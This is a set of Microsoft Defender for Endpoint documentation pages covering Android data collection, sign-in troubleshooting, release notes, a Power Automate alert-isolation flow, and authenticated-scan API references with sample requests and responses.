-The following information is collected only for Microsoft Defender for Endpoint app installed on the device.
--- App package info, including name, version, and app upgrade status.-- Actions performed in the app.-- Threat detection information, such as threat name, category, etc.-- Crash report logs generated by Android.-
-## Optional Data
-
-Optional data includes diagnostic data and feedback data. Optional diagnostic data is additional data that helps us make product improvements and provides enhanced information to help us detect, diagnose, and fix issues. Optional diagnostic data includes:
--- App, CPU, and network usage.-- State of the device from the app perspective, including scan status, scan timings, app permissions granted, and upgrade status.-- Features configured by the admin.-- Basic information about the browsers on the device.-
-**Feedback Data** is collected through in-app feedback provided by the user
--- The user's email address, if they choose to provide it.-- Feedback type (smile, frown, idea) and any feedback comments submitted by the user.
security Android Support Signin https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/android-support-signin.md
- Title: Troubleshoot issues on Microsoft Defender for Endpoint on Android
-description: Troubleshoot issues for Microsoft Defender for Endpoint on Android
------- m365-security-- tier3-- mde-android-- Previously updated : 12/18/2020--
-# Troubleshooting issues on Microsoft Defender for Endpoint on Android
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-When onboarding a device, you might see sign in issues after the app is installed.
-
-During onboarding, you might encounter sign in issues after the app is installed on your device.
-
-This article provides solutions to help address the sign-on issues.
-
-## Sign in failed - unexpected error
-
-**Sign in failed:** *Unexpected error, try later*
--
-**Message:**
-
-Unexpected error, try later
-
-**Cause:**
-
-You have an older version of "Microsoft Authenticator" app installed on your device.
-
-**Solution:**
-
-Install latest version and of [Microsoft Authenticator](https://play.google.com/store/apps/details?id=com.azure.authenticator)
-from Google Play Store and try again.
-
-## Sign in failed - invalid license
-
-**Sign in failed:** *Invalid license, contact administrator*
--
-**Message:** *Invalid license, contact administrator*
-
-**Cause:**
-
-You don't have Microsoft 365 license assigned, or your organization doesn't have a license for Microsoft 365 Enterprise subscription.
-
-**Solution:**
-
-Contact your administrator for help.
-
-## Report unsafe site
-
-Phishing websites impersonate trustworthy websites for obtaining your personal or financial information. Visit the [Provide feedback about network protection](https://www.microsoft.com/wdsi/filesubmission/exploitguard/networkprotection) page if you want to report a website that could be a phishing site.
-
-## Phishing pages aren't blocked on some OEM devices
-
-**Applies to:** Specific OEMs only
--- **Xiaomi**-
-Phishing and harmful web threats detected by Defender for Endpoint
-for Android aren't blocked on some Xiaomi devices. The following functionality doesn't work on these devices.
--
-**Cause:**
-
-Xiaomi devices include a new permission model. This permission model prevents Defender for Endpoint for Android from displaying pop-up windows while it runs in the background.
-
-Xiaomi devices permission: "Display pop-up windows while running in the background."
--
-**Solution:**
-
-Enable the required permission on Xiaomi devices.
--- Display pop-up windows while running in the background.-
-## Unable to allow permission for 'Permanent protection' during onboarding on some OEM devices
-
-**Applies to:** Specific OEM devices only.
--- **Xiaomi**-
-Defender App asks for Battery Optimization/Permanent Protection permission on devices as part of app onboarding, and selecting **Allow** returns an error that the permission couldn't be set. It only affects the last permission called "Permanent Protection."
-
-**Cause:**
-
-Xiaomi changed the battery optimization permissions in Android 11. Defender for Endpoint isn't allowed to configure this setting to ignore battery optimizations.
-
-**Solution:**
- 1. Install MDE app in personal profile. (Sign-in isn't required.)
- 2. Open the Company Portal and tap on Settings.
- 3. Go to the Battery Optimization section, tap on the **Turn Off** button, and then select on **Allow** to turn off Battery Optimization for the Company Portal.
- 4. Again, go to the Battery Optimization section and tap on the **Turn On** button. The battery saver section opens.
- 5. Find the Defender app and tap on it.
- 6. Select **No Restriction**. Go back to the Defender app in work profile and tap on **Allow** button.
- 7. The application shouldn't be uninstalled from personal profile for this to work.
-
->[!NOTE]
->This is a temporary workaround. This can be used to unblock onboarding on Xiaomi devices. The Defender team is working on a permanent fix. As the MDE app is not onboarded in the personal profile, it will not have any visibility there.
-
-## Unable to use banking applications with MDE app
-
-**Applies to:** Banking apps like iMobile Pay (ICICI), PNB ONE.
-
-**Cause:** Android allows apps in the personal profile to check if there's a VPN active on the device, even outside of the personal profile. The banking app checks that and blocks it in VPN work profiles only. The banking app doesn't work with any other VPN product.
-
-**Solution:**
-Users need to disable MDE VPN from the Settings page. The following steps can be used:
-1. Go to Settings on the mobile device.
-2. Search for VPN or open 'Network and Internet' and select on VPN.
-3. Select on Microsoft Defender and select Disconnect.
-
-Users should enable VPN when they're no longer using the banking app to ensure that their devices are protected.
-
->[!NOTE]
-> This a temporary workaround. We are working on other alternatives to provide users more control over the VPN settings from within the app.
---
-## Send in-app feedback
-
-If a user faces an issue, which isn't already addressed in the above sections or is unable to resolve using the listed steps, the user can provide **in-app feedback** along with **diagnostic data**. Our team can then investigate the logs to provide the right solution. Users can follow these steps to do the same:
-
-1. Open the **MDE application** on your device and select on the **profile icon** in the top-left corner.
-
- :::image type="content" source="media/select-profile-icon-1.jpg" alt-text="The profile icon in the Microsoft Defender for Endpoint portal" lightbox="media/select-profile-icon-1.jpg":::
-
-2. Select "Help & feedback".
-
- :::image type="content" source="media/selecthelpandfeedback2.png" alt-text="The Help & feedback option that can be selected in the Microsoft Defender for Endpoint portal" lightbox="media/selecthelpandfeedback2.png":::
-
-3. Select "Send feedback to Microsoft".
-
- :::image type="content" alt-text="Select send feedback to Microsoft" source="media/send-feedback-to-microsoft-3.jpg":::
-
-4. Choose from the given options. To report an issue, select "I want to report an issue".
-
- :::image type="content" source="media/report-issue-4.jpg" alt-text="The I want to report an issue option" lightbox="media/report-issue-4.jpg":::
-
-5. Provide details of the issue that you're facing and check "Send diagnostic data". We recommend checking "Include your email address" so that the team can reach back to you with a solution or a follow-up.
-
- :::image type="content" source="media/finalsubmit5.png" alt-text="The pane on which you can add details and attach diagnostic data" lightbox="media/finalsubmit5.png":::
-
-6. Select on "Submit" to successfully send the feedback.
security Android Whatsnew https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/android-whatsnew.md
- Title: What's new in Microsoft Defender for Endpoint on Android
-description: Learn about the major changes for previous versions of Microsoft Defender for Endpoint on Android.
------- m365-security-- tier3-- mde-android-- Previously updated : 03/04/2024--
-# What's new in Microsoft Defender for Endpoint on Android
--
-**Applies to:**
-- [Microsoft Defender for Endpoint](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-> [!IMPORTANT]
-> ## Network Protection ΓÇô Update
-> Network protection feature will soon be enabled by default for all users. The update will be rolled out in a phased manner. As a result, users will be able to see Network Protection Card in the Defender app along with App Protection and Web Protection. Users are also required to provide Location permission to complete the set up. For more information, see [Network Protection](/microsoft-365/security/defender-endpoint/android-configure#network-protection).
----
-## Device Tagging
-
-Mobile Device Tagging is now generally available. This feature enables bulk tagging the mobile devices by allowing the admins to set up tags via Intune. Admin can configure the device tags through Intune via configuration policies and push them to user's devices. Once the user installs and activates Defender, the client app passes the device tags to the Security Portal. The Device tags appear against the devices in the Device Inventory.
-
-This configuration is available for both the enrolled (MDM) devices and unenrolled (MAM) devices. For more information, see [Device Tagging (MDM)](/microsoft-365/security/defender-endpoint/android-configure#device-tagging) and [Device Tagging (MAM)](/microsoft-365/security/defender-endpoint/android-configure-mam#device-tagging).
-
-## Microsoft Defender for Endpoint on Company-owned personally enabled devices
-
-MDE is now generally available on AE COPE devices. Enterprises can onboard devices on COPE mode and push MDE to user's devices through the [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431). With this support, Android Enterprise COPE devices get the full capabilities of our offering on Android, including:
--- Phishing and web protection.-- Malware scanning.-- Network protection (preview).-- Additional breach prevention through integration with Microsoft Intune and Conditional Access.-
-Read the announcement [here](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/microsoft-defender-for-endpoint-is-now-available-on-android/ba-p/3626100).
-
-## Privacy Controls
-
-Microsoft Defender for Endpoint on Android enables Privacy Controls for both the Admins and the End Users. This includes the controls for enrolled (MDM) and unenrolled (MAM) devices. Admins can configure the privacy in the alert report while End Users can configure the information shared to their organization. For more information, see [privacy controls(MDM)](/microsoft-365/security/defender-endpoint/android-configure#privacy-controls) and [privacy controls (MAM)](/microsoft-365/security/defender-endpoint/android-configure-mam#configure-privacy-controls).
-
-## Optional Permissions and Disable Web Protection
-
-Microsoft Defender for Endpoint on Android enables **Optional Permissions** in the onboarding flow. Currently the permissions required by MDE are mandatory in the onboarding flow. With this feature, admin can deploy MDE on devices without enforcing the mandatory **VPN** and **Accessibility** permissions during onboarding. End Users can onboard the app without the mandatory permissions and can later review these permissions. This feature is currently present only for unenrolled devices (MAM). For more information, see [optional permissions](/microsoft-365/security/defender-endpoint/android-configure-mam#optional-permissions).
-
-## Microsoft Defender on Android enterprise BYOD personal profile
-
-Microsoft Defender for Endpoint is now supported on Android Enterprise personal profile (BYOD only) with all the key features including malware scanning, protection from phishing links, network protection and vulnerability management. This support is coupled with [privacy controls](/microsoft-365/security/defender-endpoint/android-configure#privacy-controls) to ensure user privacy on personal profile. For more information, read the [announcement](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/announcing-the-public-preview-of-defender-for-endpoint-personal/ba-p/3370979) and the [deployment guide](/microsoft-365/security/defender-endpoint/android-intune#set-up-microsoft-defender-in-personal-profile-on-android-enterprise-in-byod-mode).
-
-## Network protection
-
-Network Protection on Microsoft Defender for Endpoint is now available. Network protection provides protection against rogue Wi-Fi related threats, rogue hardware like pineapple devices and notifies the user if a related threat is detected. Users also see a guided experience to connect to secure networks and change networks when they're connected to an unsecure connection.
-
-It includes several admin controls to offer flexibility, such as the ability to configure the feature from within the Microsoft Intune admin center. Admins can also enable privacy controls to configure the data that's sent by Defender for Endpoint from Android devices. For more information, see [network protection](/microsoft-365/security/defender-endpoint/android-configure).
-
-> [!NOTE]
-> Microsoft Defender is no longer supported for versions 1.0.3011.0302 or earlier. Users are requested to upgrade to latest versions to keep their devices secure.
-
-To update, users can use the following steps:
-
-> 1. On your work profile, go to Managed Play Store.
-> 2. Tap on the profile icon on the top right corner and select "Manage apps and device".
-> 3. Locate MDE under updates available and select update.
-> If you encounter any issues, [submit in-app feedback](/microsoft-365/security/defender-endpoint/android-support-signin#send-in-app-feedback).
-
-## Microsoft Defender for Endpoint is now Microsoft Defender in the Play store
-
-Microsoft Defender for Endpoint is now available as **Microsoft Defender** in the play store. With this update, the app is available as preview for **Consumers in the US region**. Based on how you log into the app with your work or personal account, you have access to features for Microsoft Defender for Endpoint or for Microsoft Defender for individuals. For more information, see [this blog](https://www.microsoft.com/microsoft-365/microsoft-defender-for-individuals).
-
-## Vulnerability Management
-
-On January 25, 2022, we announced the general availability of Vulnerability management on Android and iOS. For more information, see [the techcommunity post here](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/announcing-general-availability-of-vulnerability-management/ba-p/3071663).
-
-## Upcoming permission changes for Microsoft Defender for Endpoint running Android 11 or later (Nov 2021)
-
-Release Build: 1.0.3501.0301
-Release month: Nov 2021
-Microsoft Defender for Endpoint has released this update required by [Google](https://developer.android.com/distribute/play-policies#APILevel30) to upgrade to Android API 30. This change prompts users seeking access to [new storage permission](https://developer.android.com/training/data-storage/manage-all-files#all-files-access-google-play), for devices running Android 11 or later. Users need to accept this new storage permission once they update Defender app with the release build 1.0.3501.0301 or later. This update ensures that Defender for Endpoint's app security feature to function without any disruption. For more information, review the following sections.
-
-**How will this affect your organization:** These changes take effect if you're using Microsoft Defender for Endpoint on devices running Android 11 or later and updated Defender for Endpoint to release build 1.0.3501.0301 or later.
-
-> [!NOTE]
-> The new storage permissions cannot be configured by admin to 'Auto Approve' through Microsoft Intune. User will need to take action to provide access to this permission.
--- **User experience:** Users receive a notification indicating a missing permission for app security. If the user denies this permission, the 'App security' functionality is turned off on the device. If user doesn't accept or deny permission, they'll continue to receive the prompt when unlocking their device or opening the app, until it has been approved.-
-> [!NOTE]
-> If your organization is previewing 'Tamper protection' feature and if the new storage permissions are not granted by the user within 7 days of updating to the latest version, the user might lose access to corporate resources.
-
-**What you need to do to prepare:**
-
-Notify your users and helpdesk (as applicable) that users will need to accept the new permissions when prompted after they have updated Defender for Endpoint to build 1.0.3501.0301 or later version. To accept the permissions, users should:
-
-1. Tap on the Defender for Endpoint in-app notification or open the Defender for Endpoint app. Users see a screen that lists the permissions needed. A green check mark is missing next to the Storage permission.
-
-2. Tap **Begin**.
-
-3. Tap the toggle for **Allow access to manage all files.**
-
-4. The device is now protected.
-
- > [!NOTE]
- > This permission allows Microsoft Defender for Endpoint to access storage on user's device, which helps detect and remove malicious and unwanted apps. Microsoft Defender for Endpoint accesses/scans Android app package file (.apk) only. On devices with a Work Profile, Defender for Endpoint only scans work-related files.
-
security Api Microsoft Flow https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api-microsoft-flow.md
- Title: How to use Power Automate Connector to set up a Flow for events-
-description: Use Microsoft Defender for Endpoint Flow connector to create a flow that will be triggered anytime a new event occurs on your tenant.
------- m365-security-- tier3- Previously updated : 12/18/2020--
-# How to use Power Automate Connector to set up a Flow for events
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-Automating security procedures is a standard requirement for every modern Security Operations Center (SOC). For SOC teams to operate in the most efficient way, automation is a must. Use Microsoft Power Automate to help you create automated workflows and build an end-to-end procedure automation within a few minutes. Microsoft Power Automate supports different connectors that were built exactly for that.
-
-Use this article to guide you in creating automations that are triggered by an event, such as when a new alert is created in your tenant. Microsoft Defender API has an official Power Automate Connector with many capabilities.
--
-> [!NOTE]
-> For more information about premium connectors licensing prerequisites, see [Licensing for premium connectors](/power-automate/triggers-introduction#licensing-for-premium-connectors).
-
-## Usage example
-
-The following example demonstrates how to create a Flow that is triggered anytime a new Alert occurs on your tenant. You'll be guided on defining what event starts the flow and what next action will be taken when that trigger occurs.
-
-1. Log in to [Microsoft Power Automate](https://make.powerautomate.com).
-
-2. Go to **My flows** \> **New** \> **Automated-from blank**.
-
- :::image type="content" source="media/api-flow-1.png" alt-text="The New flow pane under My flows menu item in the Microsoft Defender 365 portal" lightbox="media/api-flow-1.png":::
-
-3. Choose a name for your Flow, search for "Microsoft Defender ATP Triggers" as the trigger, and then select the new Alerts trigger.
-
- :::image type="content" source="media/api-flow-2.png" alt-text=" The Choose your flow's trigger section in the Microsoft Defender 365 portal" lightbox="media/api-flow-2.png" :::
-
-Now you have a Flow that is triggered every time a new Alert occurs.
--
-All you need to do now is choose your next steps.
-For example, you can isolate the device if the Severity of the Alert is High and send an email about it.
-The Alert trigger provides only the Alert ID and the Machine ID. You can use the connector to expand these entities.
-
-### Get the Alert entity using the connector
-
-1. Choose **Microsoft Defender ATP** for the new step.
-
-2. Choose **Alerts - Get single alert API**.
-
-3. Set the **Alert ID** from the last step as **Input**.
-
- :::image type="content" source="media/api-flow-4.png" alt-text="The Alerts pane" lightbox="media/api-flow-4.png":::
-
-### Isolate the device if the Alert's severity is High
-
-1. Add **Condition** as a new step.
-
-2. Check if the Alert severity **is equal to** High.
-
- If yes, add the **Microsoft Defender ATP - Isolate machine** action with the Machine ID and a comment.
-
- :::image type="content" source="media/api-flow-5.png" alt-text="The Actions pane" lightbox="media/api-flow-5.png":::
-
-3. Add a new step for emailing about the Alert and the Isolation. There are multiple email connectors that are easy to use, such as Outlook or Gmail.
-
-4. Save your flow.
-
-You can also create a **scheduled** flow that runs Advanced Hunting queries and much more!
-
-## Related topic
-- [Microsoft Defender for Endpoint APIs](apis-intro.md)
security Get Agent Details https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/Get-agent-details.md
- Title: Get scan agent by ID
-description: Learn how to use the "Get-Agent-Details" api.
-keywords: apis, graph api, supported apis, agent details, definition
------- m365-security-- tier3-- must-keep--- Previously updated : 04/17/2024--
-# Get scan agent ID
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](../../defender-vulnerability-management/index.yml)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-> Want to experience Microsoft Defender Vulnerability Management? Find out how to [sign up for a free trial](../../defender-vulnerability-management/get-defender-vulnerability-management.md).
----
-## API description
-
-Retrieves the details for a specified agent by its ID.
-
-## Limitations
-
-1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md).
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Machine.Read.All| Read all scan information.
-Delegated (work or school account)|Machine.Read.All|Read all scan information.
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - To view data the user needs to have at least the following role permission: 'ViewData' or 'TvmViewData' (See [Create and manage roles](../user-roles.md) for more information)
-
-## HTTP request
-
-```http
-GET /api/DeviceAuthenticatedScanAgents
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-
-## Request body
-
-Empty
-
-## Response
-
-If successful, this method returns 200 - OK response code with the details of the specified agent.
-
-## Example request
-
-Here's an example of the request.
-
-```http
-GET https://api.security.microsoft.com/api/DeviceAuthenticatedScanAgents/7f3d76a6976818553e996875dc91f55df6b26625
-```
-
-## Response example
-
-```json
-{
-"@odata.context": "https://api.security.microsoft.com/api/$metadata#DeviceAuthenticatedScanAgents/$entity",
- "value": [
- {
- "id": "47df41a0c-asad-4fd6d3-bbea-a93dbc0bfcaa_4edd75b2407a5b64d704b4e53d74f15",
- "machineId": "4ejh675b240118fbehiuiy5b64d704b4e53d15",
- "lastSeen": "2022-05-08T12:18:41.538203Z",
- "computerDnsName": "TEST_DOMAIN",
- "AssignedApplicationId": "9E0FA0EB-0A51-4357-9C87-C21BFBE07571",
- "ScannerSoftwareVersion": "7.1.1",
- "LastCommandExecutionTimestamp": "2022-05-08T12:18:41.538203Z",
- "mdeClientVersion": "10.8295.22621.1195"
- },
- ]
-}
-
-```
security Get Scan History By Definition https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/Get-scan-history-by-definition.md
- Title: Get scan history by definition
-description: Learn how to use the get scan history by definition api
------- m365-security-- tier3-- must-keep--- Previously updated : 12/15/2022--
-# Get scan history by definition
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](../../defender-vulnerability-management/index.yml)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-> Want to experience Microsoft Defender Vulnerability Management? Find out how to [sign up for a free trial](../../defender-vulnerability-management/get-defender-vulnerability-management.md).
----
-## API description
-
-Retrieves a list of the scan history by definitions.
--- Supports OData operations.-- OData supported operators:
- - $top with max value of 4096. Returns the number of sessions specified in the request.
- - $skip with a default value of 0. Skips the number of sessions specified in the request.
-
-For an example of OData operation usage, see [example $top request](#example-top-request).
-
-## Limitations
-
-1. Rate limitations for this API are 100 calls per minute and 1500 calls per hour.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md).
-
-|Permission type|Permission|Permission display name|
-|:|:|:|
-|Application|Machine.Read.All| Read all scan information.|
-|Delegated (work or school account)|Machine.Read.All|Read all scan information.|
-
-> [!NOTE]
-> When obtaining a token using user credentials:
-> - To view data the user needs to have at least the following role permission: 'ViewData' or 'TvmViewData' (See [Create and manage roles](../user-roles.md) for more information)
->
-
-## HTTP request
-
-```http
-POST api/DeviceAuthenticatedScanDefinitions/GetScanHistoryByScanDefinitionId
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|String|Bearer {token}. **Required**.
-Content-Type|string|application/json. **Required**.
-
-## Request body
-
-In the request body, supply a JSON object with the following parameters:
-
-Parameter|Type|Description
-:|:|:
-ScanDefinitionIds |String|The scan Id. **Required**.
-
-## Response
-
-If successful, this method returns 200 - OK response code with a list of the scan history by definition.
-
-## Example request
-
-Here's an example of the request.
-
-```http
-POST https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinitions/GetScanHistoryByScanDefinitionId
-```
-
-```json
-{
- "ScanDefinitionIds": ["4ad8d463-6b3a-4894-b42a-a2de9ea0a8ae", "60c4aa57-c573-4488-8d18-230914792a92", "c6220f67-2cad-4ba3-a2fa-7ded6384da56"]
-}
-```
-
-## Response example
-
-```json
-{
-"@odata.context": "https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinitions/GetScanHistoryByScanDefinitionId",
- "value": [
- {
- "ScanDefinitionIds": "4ad8d463-6b3a-4894-b42a-a2de9ea0a8ae",
- "LastScanned": "2022-12-20T11:14:24.5561791Z",
- "ScanStatus": "Partial Success",
- "ScannerId": "625431694b7d2ca9d07e77ca1b029ef216bebb6d"
- },
- {
- "ScanDefinitionIds": "60c4aa57-c573-4488-8d18-230914792a92",
- "LastScanned": "2022-11-17T15:13:24.5561791Z",
- "ScanStatus": "Partial Success",
- "ScannerId": "625431694b7d2ca9d07e77ca1b029ef216bebb6d"
- },
- {
- "ScanDefinitionIds": "c6220f67-2cad-4ba3-a2fa-7ded6384da56",
- "LastScanned": "2022-11-10T18:15:24.5561791Z",
- "ScanStatus": "Partial Success",
- "ScannerId": "625431694b7d2ca9d07e77ca1b029ef216bebb6d"
- },
- ]
-}
-
-```
-## Example $top request
-
-Here's an example of a request that returns only 1 session.
-
-```http
-POST https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinitions/GetScanHistoryByScanDefinitionId?$top=1
-```
-
-## $top Response example
-
-```json
-{
-"@odata.context": "https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinitions/GetScanHistoryByScanDefinitionId",
- "value": [
- {
- "ScanDefinitionIds": "4ad8d463-6b3a-4894-b42a-a2de9ea0a8ae",
- "LastScanned": "2022-12-20T11:14:24.5561791Z",
- "ScanStatus": "Partial Success",
- "ScannerId": "625431694b7d2ca9d07e77ca1b029ef216bebb6d"
- },
- ]
-}
-
-```
security Get Scan History By Session https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/Get-scan-history-by-session.md
- Title: Get scan history by session
-description: Learn how to use the get scan history by session api.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/15/2022--
-# Get scan history by session
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](../../defender-vulnerability-management/index.yml)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-> Want to experience Microsoft Defender Vulnerability Management? Learn more about how you can sign up to the [Microsoft Defender Vulnerability Management public preview trial](../../defender-vulnerability-management/get-defender-vulnerability-management.md).
----
-## API description
-
-Retrieves a list of the scan history by session.
-
-## Limitations
-
-1. Rate limitations for this API are 100 calls per minute and 1,500 calls per hour.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Microsoft Defender for Endpoint APIs](apis-intro.md).
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Machine.Read.All| Read all scan information.
-Delegated (work or school account)|Machine.Read.All|Read all scan information.
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - To view data the user needs to have at least the following role permission: `ViewData` or `TvmViewData`. For more information, see [Create and manage roles](../user-roles.md).
-
-## HTTP request
-
-```http
-POST /api/DeviceAuthenticatedScanDefinitions/GetScanHistoryBySessionId
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
-Authorization|string|Bearer {token}. **Required**.
-Content-Type|string|application/json. **Required**.
-
-## Request body
-
-In the request body, supply a JSON object with the following parameters:
-
-Parameter|Type|Description
-:|:|:
-SessionIds |String|The session Id. **Required**.
-
-## Response
-
-If successful, this method returns 200 - OK response code with a list of the scan history for a session.
-
-## Example request
-
-Here's an example of the request.
-
-```http
-POST https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinitions/GetScanHistoryBySessionId
-```
-
-```json
-{
- "SessionIds": ["01decc497f4b4ec49a5fc4e12597f8c8"]
-}
-```
-
-## Response example
-
-```json
-{
- "@odata.context": "https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinitions/GetScanHistoryBySessionId",
- "value": [
- {
- "orgId": "asdf781a0c-792d-46d3-bbea-a93dbc0bfcaa",
- "ScanDefinitionIds": "4ad8d463-6b3a-4894-b42a-a2de9ea0a8ae",
- "SessionIds": "01decc497f4b4ec49a5fc4e12597f8c8",
- "NumberOfSuccessfullyScannedTargets": 3,
- "NumberOfTargets": 3,
- "ScanStatus": "Success",
- "LastScanned": "2022-12-19T15:14:24.5561791Z",
- "ListScannedTargets": {
- "Ip": "127.0.0.1",
- "Hostname": "DESKTOP-Test",
- "ScannedDeviceDescription": "Network device",
- "ErrorMessage": "",
- "ScanStatus": "Success",
- "ScanDuration": "00:08:30",
- },
- {
- "Ip": "127.0.0.2",
- "Hostname": "DESKTOP-Test2",
- "ScannedDeviceDescription": "Network device 2",
- "ErrorMessage": "",
- "ScanStatus": "Success",
- "ScanDuration": "00:08:00",
- },
-{
- "Ip": "127.0.0.3",
- "Hostname": "DESKTOP-Test3",
- "ScannedDeviceDescription": "Network device 3",
- "ErrorMessage": "",
- "ScanStatus": "Success",
- "ScanDuration": "00:08:50",
- },
- }
- ]
-}
-```
security Add A New Scan Definition https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/api/add-a-new-scan-definition.md
- Title: Add, update, or delete a scan definition
-description: Learn how to use the Add, update, or delete scan definitions.
------- m365-security-- tier3-- must-keep--- Previously updated : 12/14/2022--
-# Add, update, or delete a scan definition
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender Vulnerability Management](../../defender-vulnerability-management/index.yml)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-> Want to experience Microsoft Defender Vulnerability Management? Learn more about how you can sign up to the [Microsoft Defender Vulnerability Management public preview trial](../../defender-vulnerability-management/get-defender-vulnerability-management.md).
----
-## API description
-
-API to add, update, or delete an authenticated scan.
-
-## Limitations
-
-Rate limitations for this API are 100 calls per minute and 1,500 calls per hour.
-
-You can post on machines last seen according to your configured retention period.
-
-## Permissions
-
-One of the following permissions is required to call this API. To learn more, including how to choose permissions, see [Use Defender for Endpoint APIs](apis-intro.md).
-
-Permission type|Permission|Permission display name
-:|:|:
-Application|Machine.ReadWrite.All| Read and write all scan information.
-Delegated (work or school account)|Machine.Read.Write|Read and write all scan information.
-
-> [!NOTE]
-> When obtaining a token using user credentials:
->
-> - To view data the user needs to have at least the following role permission: `ViewData` or `TvmViewData` (See [Create and manage roles](../user-roles.md) for more information)
-> - To edit data the user needs to have at least the following role permission: `ManageSecurity` (See [Create and manage roles](../user-roles.md) for more information)
-
-## HTTP request
-
-```http
-POST https://api.securitycenter.microsoft.com/api/DeviceAuthenticatedScanDefinitions
-```
-
-## Request headers
-
-Name|Type|Description
-:|:|:
